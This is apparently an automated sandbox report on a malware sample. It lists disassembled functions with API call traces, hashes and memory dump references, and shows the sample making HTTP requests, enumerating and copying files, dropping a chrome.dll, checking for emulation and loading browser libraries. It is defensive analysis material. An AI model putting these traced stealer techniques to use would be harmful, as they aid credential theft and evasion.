Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B

Function 00415440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02D471B0), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02D465D8,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478

Strings

ERROR, xrefs: 004154C3
ERROR, xrefs: 0041546A

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: fa17c6c934685f3918b257a8c310aa364b0e2efa94bfdcad8a54904fe6b66efe
Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
Opcode Fuzzy Hash: fa17c6c934685f3918b257a8c310aa364b0e2efa94bfdcad8a54904fe6b66efe
Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E

Function 004152A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
lstrcatA.KERNEL32(?,02D452F0), ref: 004152F8

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Strings

9dA, xrefs: 0041531F, 00415344, 00415322

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: 9dA
API String ID: 2699682494-3568425128
Opcode ID: a972a916d03eac4d49526e5f7699f27a798bc20969bad67154061ec1a43429aa
Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
Opcode Fuzzy Hash: a972a916d03eac4d49526e5f7699f27a798bc20969bad67154061ec1a43429aa
Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5

Function 004108ED Relevance: 4.7, APIs: 3, Instructions: 223fileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02D3E338), ref: 00410922
StrCmpCA.SHLWAPI(00000000,02D3E2E8), ref: 00410B79
StrCmpCA.SHLWAPI(00000000,02D3E1C8), ref: 00410A0C

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: DeleteFilelstrcpy
String ID:
API String ID: 273707478-0
Opcode ID: b09b4b0a2cd4e5517057d7c9942c087ad2a04c33547a0805f3b838135b4ccc33
Instruction ID: 55ebfe5bea072269aba33a565d8c59cbe62f1375a0798b8cb4aa3666f491b8e5
Opcode Fuzzy Hash: b09b4b0a2cd4e5517057d7c9942c087ad2a04c33547a0805f3b838135b4ccc33
Instruction Fuzzy Hash: EA916471B001089FCB18EF65DA95EED77B6EF94304F10816EE40A9F391DB349A49CB86

Function 00419850 Relevance: 4.5, APIs: 3, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
WriteFile.KERNEL32(000000FF,004108DC,?,004108DC,00000000,?,004108DC), ref: 004198A3

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: 66f9a9c0b54bc959ce6873a0a783983d778d5aa1bb5a4dc0f512ba4858a7750d
Instruction ID: c00870ae4f46cd9ec0fbaadc8d13ab59566e93f84a6b66ec8604c729da6f8a20
Opcode Fuzzy Hash: 66f9a9c0b54bc959ce6873a0a783983d778d5aa1bb5a4dc0f512ba4858a7750d
Instruction Fuzzy Hash: BE11C830A08248BBDB10EFA0DC15BDE7B795F05314F044199F655A72C1DB346B45C7DA

Function 00417A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2

Function 6CE43060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CE43095

Part of subcall function 6CE435A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CECF688,00001000), ref: 6CE435D5
Part of subcall function 6CE435A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CE435E0
Part of subcall function 6CE435A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CE435FD
Part of subcall function 6CE435A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CE4363F
Part of subcall function 6CE435A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CE4369F
Part of subcall function 6CE435A0: __aulldiv.LIBCMT ref: 6CE436E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CE4309F

Part of subcall function 6CE65B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CE656EE,?,00000001), ref: 6CE65B85
Part of subcall function 6CE65B50: EnterCriticalSection.KERNEL32(6CECF688,?,?,?,6CE656EE,?,00000001), ref: 6CE65B90
Part of subcall function 6CE65B50: LeaveCriticalSection.KERNEL32(6CECF688,?,?,?,6CE656EE,?,00000001), ref: 6CE65BD8
Part of subcall function 6CE65B50: GetTickCount64.KERNEL32 ref: 6CE65BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CE430BE

Part of subcall function 6CE430F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CE43127
Part of subcall function 6CE430F0: __aulldiv.LIBCMT ref: 6CE43140

Part of subcall function 6CE7AB2A: __onexit.LIBCMT ref: 6CE7AB30

Memory Dump Source

Source File: 00000000.00000002.1798696975.000000006CE41000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CE40000, based on PE: true

Associated: 00000000.00000002.1798670349.000000006CE40000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1798796176.000000006CEBD000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1798825296.000000006CECE000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1798873657.000000006CED2000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce40000_HrxOpVxK5d.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 99710e33e5484fc223c8b11179c9058f79a861460c4efb9bf2a26d15f6a8bca2
Instruction ID: 3c6e8d2584ffbb8f2133b6baeffa6d88e4a4c19a1db22b3629dcc2374aad4eb0
Opcode Fuzzy Hash: 99710e33e5484fc223c8b11179c9058f79a861460c4efb9bf2a26d15f6a8bca2
Instruction Fuzzy Hash: 25F0F962E2074496CB10DF7498411E67770AF6B114F20533DE8A457751FF30A3D883D1

Function 00419600 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
CloseHandle.KERNEL32(00000000), ref: 0041963F

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
Instruction ID: 8add19ce2c94a4db983c162c5ea883653429c1f160fd421327fd5bffa921fc45
Opcode Fuzzy Hash: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
Instruction Fuzzy Hash: 95F03A7490120CEFDB14DBA4DD4AFEA7778BB08300F004599FA1997280E6B06E84CB95

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D

Function 00406C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00406CEF

Strings

@, xrefs: 00406CC9

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
Instruction ID: 960187402ee01aff1aca01ef16381d87fa4c626a1601440f33a421b94010635f
Opcode Fuzzy Hash: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
Instruction Fuzzy Hash: D6213374A04208EFDB04CF88D544BADBBB1FF48304F1181AAD456AB381D3799A91DF85

Function 00406D90 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
Instruction ID: fd8884a5b4d1e95754380b5432cffff504e2d4d7245242e6cdc6148b35b0e1b4
Opcode Fuzzy Hash: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
Instruction Fuzzy Hash: 816127B4900209DFCB14CF94E944BEEB7B0BB48304F1185AAE80677380D779AEA5DF95

Function 00414E00 Relevance: 3.1, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414E3A
lstrcatA.KERNEL32(?,02D45F50), ref: 00414E58

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,02D471A0,?,000003E8), ref: 00414C9A
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C57

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 538c5706aebcd05416b443bbe1f19e0077520d2418bde28c69b629500b8e2370
Instruction ID: e9161ec81bcd1d29be655bd6d91fa6844fd782dbdf96c1af6834d1d6ae200bb8
Opcode Fuzzy Hash: 538c5706aebcd05416b443bbe1f19e0077520d2418bde28c69b629500b8e2370
Instruction Fuzzy Hash: F041B6B7E0410467C754F764FC52EEE333E9BC8304F40855EB54696191ED78AAC88B95

Function 00415350 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D3E158,?,004210F4,?,00000000), ref: 0041AB3B
